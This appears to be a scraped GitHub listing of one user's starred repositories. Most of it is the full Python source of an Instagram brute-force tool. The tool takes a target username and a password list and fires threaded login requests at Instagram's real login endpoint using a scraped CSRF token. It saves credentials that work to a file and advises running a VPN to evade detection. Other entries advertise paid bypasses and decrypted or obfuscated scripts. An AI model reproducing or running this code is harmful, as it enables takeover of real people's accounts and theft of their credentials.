Toxic-Aftab's starred repositories

Brute_Force_IG-ACT

from __future__ import absolute_import from __future__ import print_function import requests, sys, threading, time, os, random from random import randint from six.moves import input CheckVersion = str(sys.version) import re from datetime import datetime print(''' .... % ^ L "F3 $r $$$$.e$" . "$$$$$" " (Xzero by 4) $$$$c / . $$$$$$$P ."c $$$ .$c3b ..J$$$$$e 4$$$$ .$$$$$$$$$$$$$$c $$$$b .$$$$$$$$$$$$$$$$r $$$. .$$$$$$$$$$$$$$$$$$ $$$c .$$$$$$$ "$$$$$$$$$r Author : XzeroXvan07 Management depends on vpn software. Please use it before running the tool """""""""""""""""""""""""""""""""""""""""" ''') class InstaBrute(object): def __init__(self): try: user = input('username : ') Combo = input('passList : ') print('\n----------------------------') except: print(' The tool was arrested exit ') sys.exit() with open(Combo, 'r') as x: Combolist = x.read().splitlines() thread = [] self.Coutprox = 0 for combo in Combolist: password = combo.split(':')[0] t = threading.Thread(target=self.New_Br, args=(user, password)) t.start() thread.append(t) time.sleep(0.9) for j in thread: j.join() def cls(self): linux = 'clear' windows = 'cls' os.system([linux, windows][os.name == 'nt']) def New_Br(self,user,pwd): link = 'https://www.instagram.com/accounts/login/' login_url = 'https://www.instagram.com/accounts/login/ajax/' time = int(datetime.now().timestamp()) payload = { 'username': user, 'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{time}:{pwd}', 'queryParams': {}, 'optIntoOneTap': 'false' } with requests.Session() as s: r = s.get(link) csrf = re.findall(r"csrf_token\":\"(.*?)\"", r.text)[0] r = s.post(login_url, data=payload, headers={ "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36", "X-Requested-With": "XMLHttpRequest", "Referer": "https://www.instagram.com/accounts/login/", "x-csrftoken": csrf }) print(f'{user}:{pwd}\n----------------------------') if 'authenticated": true' in r.text: print(('' + user + ':' + pwd + ' --> Good hack ')) with open('good.txt', 'a') as x: x.write(user + ':' + pwd + '\n') elif 'two_factor_required' in r.text: print(('' + user + ':' + pwd + ' --> Good It has to be checked ')) with open('results_NeedVerfiy.txt', 'a') as x: x.write(user + ':' + pwd + '\n') InstaBrute()

Stargazers:5Issues:0Issues:0

Part_Upgrade-Master_Scripr--UA-2600

Private repo - Don't Forget to Stare - Team Xnscode - User-Agent 2600

Stargazers:2Issues:0Issues:0

CPYTHON.310.SO

ENCRYPTE YOUR SCRIPT WITH CPYTHON

Language:PythonStargazers:7Issues:0Issues:0

DECOMPILE-STORE

THERE IS A LOTS OF DECRYPTED SCRIPTS FOR U

Language:PythonStargazers:19Issues:0Issues:0
Language:PythonStargazers:2Issues:0Issues:0

OLD

GIVE MONEY TAKE APPROVAL

Language:PythonStargazers:3Issues:0Issues:0

BYPASS-STORE

THERE IS FUXKING PAID PEOPLE KEEP ENJOY FOLLOW FOR MORE FUCKING

Language:PythonStargazers:4Issues:0Issues:0
Language:PythonStargazers:7Issues:0Issues:0
Language:PythonStargazers:6Issues:0Issues:0

FILEX

Free tool from hbf

Language:PythonStargazers:2Issues:0Issues:0
Language:PythonStargazers:1Issues:0Issues:0
Language:PythonStargazers:3Issues:0Issues:0
Language:PythonStargazers:4Issues:0Issues:0
Language:PythonStargazers:2Issues:0Issues:0
Language:PythonStargazers:1Issues:0Issues:0
Language:PythonStargazers:2Issues:0Issues:0